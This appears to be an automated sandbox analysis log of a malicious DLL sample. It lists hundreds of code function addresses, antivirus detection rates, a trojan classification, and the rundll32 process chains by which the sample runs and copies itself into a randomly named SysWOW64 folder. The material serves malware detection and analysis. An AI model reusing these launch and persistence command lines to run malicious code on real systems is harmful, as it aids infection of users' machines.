Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10011C10	6_2_10011C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000E21C	6_2_1000E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000F41F	6_2_1000F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10015220	6_2_10015220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10009E22	6_2_10009E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000D223	6_2_1000D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000EC27	6_2_1000EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001F83F	6_2_1001F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10021A3C	6_2_10021A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001E441	6_2_1001E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10002043	6_2_10002043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000A048	6_2_1000A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10002654	6_2_10002654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10009A57	6_2_10009A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001406E	6_2_1001406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10001C76	6_2_10001C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10007283	6_2_10007283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10020687	6_2_10020687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001748A	6_2_1001748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000CC8D	6_2_1000CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001D091	6_2_1001D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10003C91	6_2_10003C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000AC95	6_2_1000AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001AC9B	6_2_1001AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000FEA0	6_2_1000FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100178A5	6_2_100178A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001D6A7	6_2_1001D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001CAA8	6_2_1001CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100144AA	6_2_100144AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000DAAE	6_2_1000DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10005AB2	6_2_10005AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100190BA	6_2_100190BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100198BD	6_2_100198BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001BEC9	6_2_1001BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10017ED1	6_2_10017ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001CCD4	6_2_1001CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10010ADE	6_2_10010ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001A8F0	6_2_1001A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100030F6	6_2_100030F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10003502	6_2_10003502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10002309	6_2_10002309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001FD10	6_2_1001FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000251C	6_2_1000251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10005923	6_2_10005923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10006B25	6_2_10006B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1002292B	6_2_1002292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10020B34	6_2_10020B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10021343	6_2_10021343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10003345	6_2_10003345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001F14D	6_2_1001F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000C158	6_2_1000C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10003F5C	6_2_10003F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10011F6B	6_2_10011F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001056A	6_2_1001056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001577E	6_2_1001577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10014D8D	6_2_10014D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10004F8E	6_2_10004F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000758F	6_2_1000758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000FD91	6_2_1000FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10021193	6_2_10021193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001B397	6_2_1001B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10019DA1	6_2_10019DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10012FA2	6_2_10012FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10014BAA	6_2_10014BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100143B3	6_2_100143B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001B1B5	6_2_1001B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000BFB6	6_2_1000BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100225C3	6_2_100225C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10006FC4	6_2_10006FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000A3DF	6_2_1000A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100055E8	6_2_100055E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001BFE8	6_2_1001BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100203F1	6_2_100203F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000C5FE	6_2_1000C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000441E	7_2_1000441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CAA8	7_2_1001CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100143B3	7_2_100143B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004C00	7_2_10004C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10008C09	7_2_10008C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10001A0A	7_2_10001A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000220A	7_2_1000220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10011C10	7_2_10011C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000E21C	7_2_1000E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000F41F	7_2_1000F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10015220	7_2_10015220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10009E22	7_2_10009E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D223	7_2_1000D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000EC27	7_2_1000EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001F83F	7_2_1001F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10021A3C	7_2_10021A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001E441	7_2_1001E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002043	7_2_10002043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003845	7_2_10003845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002A46	7_2_10002A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000A048	7_2_1000A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002654	7_2_10002654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10009A57	7_2_10009A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001406E	7_2_1001406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10001C76	7_2_10001C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10007283	7_2_10007283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10020687	7_2_10020687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10014E8A	7_2_10014E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001748A	7_2_1001748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000CC8D	7_2_1000CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D091	7_2_1001D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003C91	7_2_10003C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000AC95	7_2_1000AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001AC9B	7_2_1001AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000FEA0	7_2_1000FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100178A5	7_2_100178A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D6A7	7_2_1001D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100144AA	7_2_100144AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000DAAE	7_2_1000DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10005AB2	7_2_10005AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100190BA	7_2_100190BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100198BD	7_2_100198BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001BEC9	7_2_1001BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10017ED1	7_2_10017ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100208D1	7_2_100208D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CCD4	7_2_1001CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10010ADE	7_2_10010ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001ECE3	7_2_1001ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001AEEB	7_2_1001AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001A8F0	7_2_1001A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001DEF4	7_2_1001DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100030F6	7_2_100030F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003502	7_2_10003502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002309	7_2_10002309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001FD10	7_2_1001FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000251C	7_2_1000251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10005923	7_2_10005923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10006B25	7_2_10006B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1002292B	7_2_1002292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10020B34	7_2_10020B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10021343	7_2_10021343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003345	7_2_10003345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001F14D	7_2_1001F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C158	7_2_1000C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003F5C	7_2_10003F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10011F6B	7_2_10011F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001056A	7_2_1001056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001577E	7_2_1001577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10009384	7_2_10009384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10014D8D	7_2_10014D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004F8E	7_2_10004F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000758F	7_2_1000758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000FD91	7_2_1000FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10021193	7_2_10021193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B397	7_2_1001B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D99A	7_2_1001D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10019DA1	7_2_10019DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10012FA2	7_2_10012FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10014BAA	7_2_10014BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10017BB2	7_2_10017BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B1B5	7_2_1001B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000BFB6	7_2_1000BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100225C3	7_2_100225C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10006FC4	7_2_10006FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000A3DF	7_2_1000A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100055E8	7_2_100055E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001BFE8	7_2_1001BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100203F1	7_2_100203F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C5FE	7_2_1000C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000220A	8_2_1000220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000441E	8_2_1000441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10015220	8_2_10015220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000EC27	8_2_1000EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001F83F	8_2_1001F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10003845	8_2_10003845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001748A	8_2_1001748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000AC95	8_2_1000AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100178A5	8_2_100178A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100144AA	8_2_100144AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10005AB2	8_2_10005AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10017ED1	8_2_10017ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100208D1	8_2_100208D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001ECE3	8_2_1001ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001DEF4	8_2_1001DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100030F6	8_2_100030F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10009384	8_2_10009384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000758F	8_2_1000758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10014BAA	8_2_10014BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000BFB6	8_2_1000BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10006FC4	8_2_10006FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100055E8	8_2_100055E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000C5FE	8_2_1000C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10004C00	8_2_10004C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10008C09	8_2_10008C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10001A0A	8_2_10001A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10011C10	8_2_10011C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000E21C	8_2_1000E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000F41F	8_2_1000F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10009E22	8_2_10009E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000D223	8_2_1000D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10021A3C	8_2_10021A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001E441	8_2_1001E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10002043	8_2_10002043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10002A46	8_2_10002A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000A048	8_2_1000A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10002654	8_2_10002654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10009A57	8_2_10009A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001406E	8_2_1001406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10001C76	8_2_10001C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10007283	8_2_10007283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10020687	8_2_10020687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10014E8A	8_2_10014E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000CC8D	8_2_1000CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001D091	8_2_1001D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10003C91	8_2_10003C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001AC9B	8_2_1001AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000FEA0	8_2_1000FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001D6A7	8_2_1001D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001CAA8	8_2_1001CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000DAAE	8_2_1000DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100190BA	8_2_100190BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100198BD	8_2_100198BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001BEC9	8_2_1001BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001CCD4	8_2_1001CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10010ADE	8_2_10010ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001AEEB	8_2_1001AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001A8F0	8_2_1001A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10003502	8_2_10003502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10002309	8_2_10002309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001FD10	8_2_1001FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000251C	8_2_1000251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10005923	8_2_10005923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10006B25	8_2_10006B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1002292B	8_2_1002292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10020B34	8_2_10020B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10021343	8_2_10021343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10003345	8_2_10003345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001F14D	8_2_1001F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000C158	8_2_1000C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10003F5C	8_2_10003F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10011F6B	8_2_10011F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001056A	8_2_1001056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001577E	8_2_1001577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10014D8D	8_2_10014D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10004F8E	8_2_10004F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000FD91	8_2_1000FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10021193	8_2_10021193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001B397	8_2_1001B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001D99A	8_2_1001D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10019DA1	8_2_10019DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10012FA2	8_2_10012FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100143B3	8_2_100143B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10017BB2	8_2_10017BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001B1B5	8_2_1001B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100225C3	8_2_100225C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000A3DF	8_2_1000A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001BFE8	8_2_1001BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100203F1	8_2_100203F1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 6F33D020 appears 48 times

Source: pYebrdRKvR.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pYebrdRKvR.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: pYebrdRKvR.dll	Virustotal: Detection: 18%
Source: pYebrdRKvR.dll	ReversingLabs: Detection: 17%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pYebrdRKvR.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pYebrdRKvR.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Olcnhkjrspgysi\kpevmak.bsr",xeRCFlLGA
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Olcnhkjrspgysi\kpevmak.bsr",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pYebrdRKvR.dll,Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pYebrdRKvR.dll,Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Olcnhkjrspgysi\kpevmak.bsr",xeRCFlLGA	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Olcnhkjrspgysi\kpevmak.bsr",Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDLL@20/7@0/21

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_10011B54 CreateToolhelp32Snapshot,

8_2_10011B54

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pYebrdRKvR.dll,Control_RunDLL

Source: C:\Windows\SysWOW64\rundll32.exe

Mutant created: \Sessions\1\BaseNamedObjects\7ce3e80173264ea19b05306b865eadf9

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
